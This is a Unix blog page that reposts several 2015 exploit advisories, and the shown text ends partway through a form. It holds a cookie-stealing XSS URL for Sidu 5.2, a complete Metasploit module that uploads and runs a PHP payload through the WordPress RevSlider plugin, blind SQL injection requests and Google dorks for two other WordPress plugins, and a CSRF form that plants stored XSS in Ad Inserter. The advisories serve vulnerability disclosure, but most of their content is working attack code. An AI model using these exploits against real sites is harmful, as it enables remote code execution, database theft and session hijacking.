MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

15May/150

Sidu 5.2 Admin XSS Vulnerability

Affected Vendor:
www.topnew.net/sidu/
 
Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org
 
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt
 
Product:
Sidu version 5.2 is a web based database front-end administration tool.
 
Advisory Information:
=====================================================
Sidu 5.2 is vulnerable to cross site scripting attacks.
 
Exploit code:
==============
 
http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E
 
Disclosure Timeline:
==================================
 
Vendor Notification  May 12, 2015
May 13, 2015: Public Disclosure
 
Severity Level:
===============
High
 
Description:
============
 
Request Method(s):
                                [+] GET
Vulnerable Product:
                                [+] Sidu 5.2
Vulnerable Parameter(s):
                                [+] sql=[XSS]
Affected Area(s):
                                [+] Admin of currently logged in user.
==============================
 
(hyp3rlinx)

(135)

15May/150

WordPress RevSlider 3.0.95 File Upload / Execute

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Simo Ben youssef', # Vulnerability discovery
          'Tom Sellers <tom[at]fadedcode.net>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
          ['EDB', '35385'],
          ['WPVDB', '7954'],
          ['OSVDB', '115118']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]],
      'DisclosureDate' => 'Nov 26 2015',
      'DefaultTarget'  => 0)
    )
  end
 
  def check
    release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt')
    check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96')
  end
 
  def exploit
    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'
 
    # Build the zip
    payload_zip = Rex::Zip::Archive.new
    # If the filename in the zip is revslider.php it will be automatically
    # executed but it will break the plugin and sometimes WordPress
    payload_zip.add_file('revslider/' + php_pagename, payload.encoded)
 
    # Build the POST body
    data = Rex::MIME::Message.new
    data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"')
    data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"')
    data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"")
    post_data = data.to_s
 
    res = send_request_cgi(
      'uri'     => wordpress_url_admin_ajax,
      'method'  => 'POST',
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    )
 
    if res
      if res.code == 200 && res.body =~ /Update in progress/
        # The payload itself almost never deleted, try anyway
        register_files_for_cleanup(php_pagename)
        # This normally works
        register_files_for_cleanup('../revslider.zip')
        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename)
        print_good("#{peer} - Our payload is at: #{final_uri}")
        print_status("#{peer} - Calling payload...")
        send_request_cgi(
          'uri'     => normalize_uri(final_uri),
          'timeout' => 5
        )
      elsif res.code == 200 && res.body =~ /^0$/
        # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown
        fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated")
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'ERROR')
    end
 
  end
end

(150)

15May/150

WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
 
1. Summary:
 
    Ultimate Product Catalogue is a responsive and easily customizable
plugin for all your product catalogue needs. It has +62.000 downloads,
+4.000 active installations.
 
    Unauthenticated SQL injection in ajax call when the plugin is counting
the times a product is being seen by the web visitors. The vulnerable POST
parameter is "Item_ID".
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:
 
    In file Functions/Process_Ajax.php line 67:
 [...]
$Item_ID = $_POST['Item_ID'];
        $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name
WHERE Item_ID=" . $Item_ID);
[...]
 
3. Proof of concept:
 
    POST /wp-admin/admin-ajax.php HTTP/1.1
  Host: <wordpress host>
  [...]
  Cookie: wordpress_f305[...]
 
  Item_ID=2 AND SLEEP(5)&action=record_view
 
4. Solution:
 
    Update to version 3.1.3
 
-- 
Felipe Molina de la Torre
 
PGP Key ID: BB7CFB45
 
 
 
--------
ISSUE 2:
 
 
# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue
wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache
2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
 
1. Summary:
 
     Ultimate Product Catalogue is A responsive and easily customizable
plugin for all your product catalogue needs. It has +62.000 downloads,
+4.000 active installations.
 
 Unauthenticated SQL injection in parameter "SingleProduct" when a web
visitor explores a product published by the web administrator
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:
 
    File Functions/Shortcodes.php line 779
 
3. Proof of concept
 
    http://<wordpress site>/?SingleProduct=2'+and+'a'='a
    http://<wordpress site>/?SingleProduct=2'+and+'a'='b
 
4. Solution:
 
    Update to version 3.1.3
 
-- 
Felipe Molina de la Torre
 
PGP Key ID: BB7CFB45

(316)

15May/150

WordPress Freshmail 1.5.8 SQL Injection

------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
 
There is a SQL Injection vulnerability available for collaborators (or
higher privileged users) for webs with freshmail plugin installed. The SQL
Injection in located in the attribute "id" of the inserted shortcode
[FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before
inserting it in a SQL query.
 
A collaborator can insert shortcodes when he/she is editing a new post or
page and can preview the results (no administrator approval needed),
launching this SQL Injection.
 
 
2. Vulnerability timeline
----------------------------------
 
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
 
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
 
3. Vulnerable code
---------------------------
 
Vulnerable File: include/shortcode.php, lines 27 and 120:
 
Line 19: function fm_form_func($atts)
[...]
Line 27: $form_value = $wpdb->get_row("select * from
".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
[...]
Line 120: add_shortcode('FM_form', 'fm_form_func');
 
 
3. Proof of concept
---------------------------
 
1. As collaborator, start a new post.
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
3. Click preview.
4. If the form is shown, the statement is true, if not, false.
 
POST /wp-admin/post.php HTTP/1.1
Host: <web>
Content-Length: 3979
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: <web>
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_f305[...]
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wpnonce"
 
0a75a3666b
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_http_referer"
 
/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="user_ID"
 
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="action"
 
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="originalaction"
 
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_author"
 
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_type"
 
post
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_post_status"
 
pending
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="referredby"
 
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_original_http_referer"
 
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_ID"
 
69
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="meta-box-order-nonce"
 
f8aa04e508
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="closedpostboxesnonce"
 
ebf65a43ed
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_title"
 
Testing SQLi in shortcode
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="samplepermalinknonce"
 
e753a2d8f2
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="content"
 
[FM_form id='1" and substr(user(),1,1)="b]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="wp-preview"
 
dopreview
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_publish"
 
Submit for Review
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_format"
 
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
 
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
 
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="tax_input[post_tag]"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="newtag[post_tag]"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="excerpt"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="trackback_url"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyselect"
 
#NONE#
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyinput"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metavalue"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_ajax_nonce-add-meta"
 
6a13a5a808
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="advanced_view"
 
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="comment_status"
 
open
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="ping_status"
 
open
------WebKitFormBoundary384PE6lRgBcOibkL--
 
 
5. Solution
---------------
 
Update to version 1.6
 
 
------------------------
ISSUE 2:
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
 
There is a unauthenticated SQL injection vulnerability in the "Subscribe to
our newsletter" formularies showed to the web visitors in the POST
parameter *fm_form_id. *
 
2. Vulnerability timeline
----------------------------------
 
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
 
- 05/05/2015: Response from the developer.
        - 06/05/2015: Fixed version in 1.6
 
3. Vulnerable code
---------------------------
 
Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
 
[...]
Line 28:  add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29:  add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result =3D $_POST;
[...]
Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id=3D"'.*$result['fm_form_id']*.'";');
[...]
 
3. Proof of concept
---------------------------
 
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <web>
X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]
 
form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and
"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F
 
4. Explanation
---------------------
 
A page visitor can submit an email (fake@fake.com) to subscribe to the
formulary with fm_form_id=3D"1" and the JSON message received will be simil=
ar
to:
 
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
uccess","message":"*Your
sign up request was successful! Please check your email inbox.*"}
 
The second time he tries to do the same with the same email the message
returned will be:
 
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
uccess","message":"*Given
email address is already subscribed, thank you!*"}
 
If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa=
me
message  indicating that the Given email is already subscribed indicating
that the first character of the username is an "a" or a null message
indicating that the username first character is not an "a".
 
5. Solution
---------------
 
Update to version 1.6

(122)

9May/150

WordPress Ad Inserter 1.5.2 CSRF / XSS

================================================================
CSRF/Stored XSS Vulnerability in Ad Inserter Plugin 
================================================================
 
 
. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/
* Severity: HIGH
* Version Affected: Version  1.5.2  and mostly prior to it
* Version Tested : Version  1.5.2
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
* ad1_name
* Block 1
* Block Name
* adinserter name
* disable adinserter 
 
 
About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.
 
Vulnerability Class
=================== 
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
 
Steps to Reproduce: (POC)
=========================
 
After installing the plugin
 
1. Goto Dashboard --> Setting -->   Ad Inserter --> Block1
 
2. Insert this payload ## "> <img src="/" =_=" title="onerror='prompt(document.cookie)'"> ## Into  above mention Vulnerable parameter Save settings and see XSS in action
 
3. Visit Ad Inserter settings page of this plugin anytime later and you can see the script executing as it is stored.
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
CSRF POC Code
=============
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1/wp/wp-admin/options-general.php?page=ad-inserter.php" method="POST">
      <input type="hidden" name="ad_save" value="Save All Settings" />
      <input type="hidden" name="ad1_name" value="<img src="/" =_=" title="onerror='prompt(document.cookie)'">" />
      <input type="hidden" name="ad1_process_php" value="0" />
      <input type="hidden" name="ad1_data" value="" />
      <input type="hidden" name="ad1_displayType" value="None" />
      <input type="hidden" name="ad1_display_for_users" value="all" />
      <input type="hidden" name="ad1_display_for_devices" value="all" />
      <input type="hidden" name="ad1_floatType" value="None" />
      <input type="hidden" name="ad1_custom_css" value="" />
      <input type="hidden" name="ad1_widget_settings_post" value="0" />
      <input type="hidden" name="ad1_widget_settings_post" value="1" />
      <input type="hidden" name="ad1_widget_settings_page" value="0" />
      <input type="hidden" name="ad1_widget_settings_home" value="0" />
      <input type="hidden" name="ad1_widget_settings_home" value="1" />
      <input type="hidden" name="ad1_widget_settings_category" value="0" />
      <input type="hidden" name="ad1_widget_settings_category" value="1" />
      <input type="hidden" name="ad1_widget_settings_search" value="0" />
      <input type="hidden" name="ad1_widget_settings_search" value="1" />
      <input type="hidden" name="ad1_widget_settings_archive" value="0" />
      <input type="hidden" name="ad1_widget_settings_archive" value="1" />
      <input type="hidden" name="ad1_after_day" value="0" />
      <input type="hidden" name="ad1_general_tag" value="gadgets" />
      <input type="hidden" name="ad1_block_user" value="" />
      <input type="hidden" name="ad1_domain_list_type" value="Black List" />
      <input type="hidden" name="ad1_block_cat" value="" />
      <input type="hidden" name="ad1_block_cat_type" value="Black List" />
      <input type="hidden" name="ad1_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad1_paragraph_text" value="" />
      <input type="hidden" name="ad1_paragraphNumber" value="0" />
      <input type="hidden" name="ad1_directionType" value="From Top" />
      <input type="hidden" name="ad1_excerptNumber" value="0" />
      <input type="hidden" name="ad1_enable_manual" value="0" />
      <input type="hidden" name="ad1_enable_php_call" value="0" />
      <input type="hidden" name="ad2_name" value="Block 2" />
      <input type="hidden" name="ad2_process_php" value="0" />
      <input type="hidden" name="ad2_data" value="" />
      <input type="hidden" name="ad2_displayType" value="None" />
      <input type="hidden" name="ad2_display_for_users" value="all" />
      <input type="hidden" name="ad2_display_for_devices" value="all" />
      <input type="hidden" name="ad2_floatType" value="None" />
      <input type="hidden" name="ad2_custom_css" value="" />
      <input type="hidden" name="ad2_widget_settings_post" value="0" />
      <input type="hidden" name="ad2_widget_settings_post" value="1" />
      <input type="hidden" name="ad2_widget_settings_page" value="0" />
      <input type="hidden" name="ad2_widget_settings_home" value="0" />
      <input type="hidden" name="ad2_widget_settings_home" value="1" />
      <input type="hidden" name="ad2_widget_settings_category" value="0" />
      <input type="hidden" name="ad2_widget_settings_category" value="1" />
      <input type="hidden" name="ad2_widget_settings_search" value="0" />
      <input type="hidden" name="ad2_widget_settings_search" value="1" />
      <input type="hidden" name="ad2_widget_settings_archive" value="0" />
      <input type="hidden" name="ad2_widget_settings_archive" value="1" />
      <input type="hidden" name="ad2_after_day" value="0" />
      <input type="hidden" name="ad2_general_tag" value="gadgets" />
      <input type="hidden" name="ad2_block_user" value="" />
      <input type="hidden" name="ad2_domain_list_type" value="Black List" />
      <input type="hidden" name="ad2_block_cat" value="" />
      <input type="hidden" name="ad2_block_cat_type" value="Black List" />
      <input type="hidden" name="ad2_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad2_paragraph_text" value="" />
      <input type="hidden" name="ad2_paragraphNumber" value="0" />
      <input type="hidden" name="ad2_directionType" value="From Top" />
      <input type="hidden" name="ad2_excerptNumber" value="0" />
      <input type="hidden" name="ad2_enable_manual" value="0" />
      <input type="hidden" name="ad2_enable_php_call" value="0" />
      <input type="hidden" name="ad3_name" value="Block 3" />
      <input type="hidden" name="ad3_process_php" value="0" />
      <input type="hidden" name="ad3_data" value="" />
      <input type="hidden" name="ad3_displayType" value="None" />
      <input type="hidden" name="ad3_display_for_users" value="all" />
      <input type="hidden" name="ad3_display_for_devices" value="all" />
      <input type="hidden" name="ad3_floatType" value="None" />
      <input type="hidden" name="ad3_custom_css" value="" />
      <input type="hidden" name="ad3_widget_settings_post" value="0" />
      <input type="hidden" name="ad3_widget_settings_post" value="1" />
      <input type="hidden" name="ad3_widget_settings_page" value="0" />
      <input type="hidden" name="ad3_widget_settings_home" value="0" />
      <input type="hidden" name="ad3_widget_settings_home" value="1" />
      <input type="hidden" name="ad3_widget_settings_category" value="0" />
      <input type="hidden" name="ad3_widget_settings_category" value="1" />
      <input type="hidden" name="ad3_widget_settings_search" value="0" />
      <input type="hidden" name="ad3_widget_settings_search" value="1" />
      <input type="hidden" name="ad3_widget_settings_archive" value="0" />
      <input type="hidden" name="ad3_widget_settings_archive" value="1" />
      <input type="hidden" name="ad3_after_day" value="0" />
      <input type="hidden" name="ad3_general_tag" value="gadgets" />
      <input type="hidden" name="ad3_block_user" value="" />
      <input type="hidden" name="ad3_domain_list_type" value="Black List" />
      <input type="hidden" name="ad3_block_cat" value="" />
      <input type="hidden" name="ad3_block_cat_type" value="Black List" />
      <input type="hidden" name="ad3_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad3_paragraph_text" value="" />
      <input type="hidden" name="ad3_paragraphNumber" value="0" />
      <input type="hidden" name="ad3_directionType" value="From Top" />
      <input type="hidden" name="ad3_excerptNumber" value="0" />
      <input type="hidden" name="ad3_enable_manual" value="0" />
      <input type="hidden" name="ad3_enable_php_call" value="0" />
      <input type="hidden" name="ad4_name" value="Block 4" />
      <input type="hidden" name="ad4_process_php" value="0" />
      <input type="hidden" name="ad4_data" value="" />
      <input type="hidden" name="ad4_displayType" value="None" />
      <input type="hidden" name="ad4_display_for_users" value="all" />
      <input type="hidden" name="ad4_display_for_devices" value="all" />
      <input type="hidden" name="ad4_floatType" value="None" />
      <input type="hidden" name="ad4_custom_css" value="" />
      <input type="hidden" name="ad4_widget_settings_post" value="0" />
      <input type="hidden" name="ad4_widget_settings_post" value="1" />
      <input type="hidden" name="ad4_widget_settings_page" value="0" />
      <input type="hidden" name="ad4_widget_settings_home" value="0" />
      <input type="hidden" name="ad4_widget_settings_home" value="1" />
      <input type="hidden" name="ad4_widget_settings_category" value="0" />
      <input type="hidden" name="ad4_widget_settings_category" value="1" />
      <input type="hidden" name="ad4_widget_settings_search" value="0" />
      <input type="hidden" name="ad4_widget_settings_search" value="1" />
      <input type="hidden" name="ad4_widget_settings_archive" value="0" />
      <input type="hidden" name="ad4_widget_settings_archive" value="1" />
      <input type="hidden" name="ad4_after_day" value="0" />
      <input type="hidden" name="ad4_general_tag" value="gadgets" />
      <input type="hidden" name="ad4_block_user" value="" />
      <input type="hidden" name="ad4_domain_list_type" value="Black List" />
      <input type="hidden" name="ad4_block_cat" value="" />
      <input type="hidden" name="ad4_block_cat_type" value="Black List" />
      <input type="hidden" name="ad4_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad4_paragraph_text" value="" />
      <input type="hidden" name="ad4_paragraphNumber" value="0" />
      <input type="hidden" name="ad4_directionType" value="From Top" />
      <input type="hidden" name="ad4_excerptNumber" value="0" />
      <input type="hidden" name="ad4_enable_manual" value="0" />
      <input type="hidden" name="ad4_enable_php_call" value="0" />
      <input type="hidden" name="ad5_name" value="Block 5" />
      <input type="hidden" name="ad5_process_php" value="0" />
      <input type="hidden" name="ad5_data" value="" />
      <input type="hidden" name="ad5_displayType" value="None" />
      <input type="hidden" name="ad5_display_for_users" value="all" />
      <input type="hidden" name="ad5_display_for_devices" value="all" />
      <input type="hidden" name="ad5_floatType" value="None" />
      <input type="hidden" name="ad5_custom_css" value="" />
      <input type="hidden" name="ad5_widget_settings_post" value="0" />
      <input type="hidden" name="ad5_widget_settings_post" value="1" />
      <input type="hidden" name="ad5_widget_settings_page" value="0" />
      <input type="hidden" name="ad5_widget_settings_home" value="0" />
      <input type="hidden" name="ad5_widget_settings_home" value="1" />
      <input type="hidden" name="ad5_widget_settings_category" value="0" />
      <input type="hidden" name="ad5_widget_settings_category" value="1" />
      <input type="hidden" name="ad5_widget_settings_search" value="0" />
      <input type="hidden" name="ad5_widget_settings_search" value="1" />
      <input type="hidden" name="ad5_widget_settings_archive" value="0" />
      <input type="hidden" name="ad5_widget_settings_archive" value="1" />
      <input type="hidden" name="ad5_after_day" value="0" />
      <input type="hidden" name="ad5_general_tag" value="gadgets" />
      <input type="hidden" name="ad5_block_user" value="" />
      <input type="hidden" name="ad5_domain_list_type" value="Black List" />
      <input type="hidden" name="ad5_block_cat" value="" />
      <input type="hidden" name="ad5_block_cat_type" value="Black List" />
      <input type="hidden" name="ad5_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad5_paragraph_text" value="" />
      <input type="hidden" name="ad5_paragraphNumber" value="0" />
      <input type="hidden" name="ad5_directionType" value="From Top" />
      <input type="hidden" name="ad5_excerptNumber" value="0" />
      <input type="hidden" name="ad5_enable_manual" value="0" />
      <input type="hidden" name="ad5_enable_php_call" value="0" />
      <input type="hidden" name="ad6_name" value="Block 6" />
      <input type="hidden" name="ad6_process_php" value="0" />
      <input type="hidden" name="ad6_data" value="" />
      <input type="hidden" name="ad6_displayType" value="None" />
      <input type="hidden" name="ad6_display_for_users" value="all" />
      <input type="hidden" name="ad6_display_for_devices" value="all" />
      <input type="hidden" name="ad6_floatType" value="None" />
      <input type="hidden" name="ad6_custom_css" value="" />
      <input type="hidden" name="ad6_widget_settings_post" value="0" />
      <input type="hidden" name="ad6_widget_settings_post" value="1" />
      <input type="hidden" name="ad6_widget_settings_page" value="0" />
      <input type="hidden" name="ad6_widget_settings_home" value="0" />
      <input type="hidden" name="ad6_widget_settings_home" value="1" />
      <input type="hidden" name="ad6_widget_settings_category" value="0" />
      <input type="hidden" name="ad6_widget_settings_category" value="1" />
      <input type="hidden" name="ad6_widget_settings_search" value="0" />
      <input type="hidden" name="ad6_widget_settings_search" value="1" />
      <input type="hidden" name="ad6_widget_settings_archive" value="0" />
      <input type="hidden" name="ad6_widget_settings_archive" value="1" />
      <input type="hidden" name="ad6_after_day" value="0" />
      <input type="hidden" name="ad6_general_tag" value="gadgets" />
      <input type="hidden" name="ad6_block_user" value="" />
      <input type="hidden" name="ad6_domain_list_type" value="Black List" />
      <input type="hidden" name="ad6_block_cat" value="" />
      <input type="hidden" name="ad6_block_cat_type" value="Black List" />
      <input type="hidden" name="ad6_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad6_paragraph_text" value="" />
      <input type="hidden" name="ad6_paragraphNumber" value="0" />
      <input type="hidden" name="ad6_directionType" value="From Top" />
      <input type="hidden" name="ad6_excerptNumber" value="0" />
      <input type="hidden" name="ad6_enable_manual" value="0" />
      <input type="hidden" name="ad6_enable_php_call" value="0" />
      <input type="hidden" name="ad7_name" value="Block 7" />
      <input type="hidden" name="ad7_process_php" value="0" />
      <input type="hidden" name="ad7_data" value="" />
      <input type="hidden" name="ad7_displayType" value="None" />
      <input type="hidden" name="ad7_display_for_users" value="all" />
      <input type="hidden" name="ad7_display_for_devices" value="all" />
      <input type="hidden" name="ad7_floatType" value="None" />
      <input type="hidden" name="ad7_custom_css" value="" />
      <input type="hidden" name="ad7_widget_settings_post" value="0" />
      <input type="hidden" name="ad7_widget_settings_post" value="1" />
      <input type="hidden" name="ad7_widget_settings_page" value="0" />
      <input type="hidden" name="ad7_widget_settings_home" value="0" />
      <input type="hidden" name="ad7_widget_settings_home" value="1" />
